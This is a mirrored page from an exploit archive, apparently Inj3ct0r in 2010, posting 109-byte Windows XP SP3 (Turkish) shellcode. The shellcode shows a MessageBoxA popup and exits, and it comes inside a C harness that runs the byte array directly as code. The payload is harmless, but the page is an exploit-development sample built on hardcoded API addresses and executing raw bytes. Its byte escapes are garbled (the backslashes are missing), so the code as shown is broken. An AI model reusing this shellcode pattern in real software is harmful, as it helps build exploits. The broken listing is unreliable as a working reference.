Home / os / win7

win32/xp sp3 (Tr) MessageBoxA Shellcode 109 bytes

Posted on 14 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>win32/xp sp3 (Tr) MessageBoxA Shellcode 109 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================
win32/xp sp3 (Tr) MessageBoxA Shellcode 109 bytes
=================================================

# Title    : win32/xp sp3 (Tr) MessageBoxA Shellcode 109 bytes
# Proof    : http://img443.imageshack.us/img443/7900/proofaz.jpg
# Author   : ZoRLu
# mail-msn : admin@yildirimordulari.com
# Home     : z0rlu.blogspot.com
# Date     : 14/09/2010
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Temenni  : Yeni Anayasamiz Hayirli Olsun
# Lakirdi  : I dont know very well assembly. but, I know I will learn its too :P


#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
 
int main(){
    
    unsigned char shellcode[]=
    &quot;x31xc0x31xdbx31xd9x31xd2xebx35x59x88x51x0axbbx7bx1d&quot;
    &quot;x80x7cx51xffxd3xebx37x59x31xd2x88x51x0bx51x50xbbx30&quot;
    &quot;xaex80x7cxffxd3xebx37x59x31xd2x88x51x07x52x52x51x52&quot;
    &quot;xffxd0x31xd2x50xb8xfaxcax81x7cxffxd0xe8xc6xffxffxff&quot;
    &quot;x75x73x65x72x33x32x2ex64x6cx6cx4exe8xc4xffxffxffx4d&quot;
    &quot;x65x73x73x61x67x65x42x6fx78x41x4exe8xc4xffxffxffx69&quot;
    &quot;x74x73x20x6fx6bx21xff&quot;;
 
    printf(&quot;Size = %d bytes
&quot;, strlen(shellcode));
 
    ((void (*)())shellcode)();
 
    return 0;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :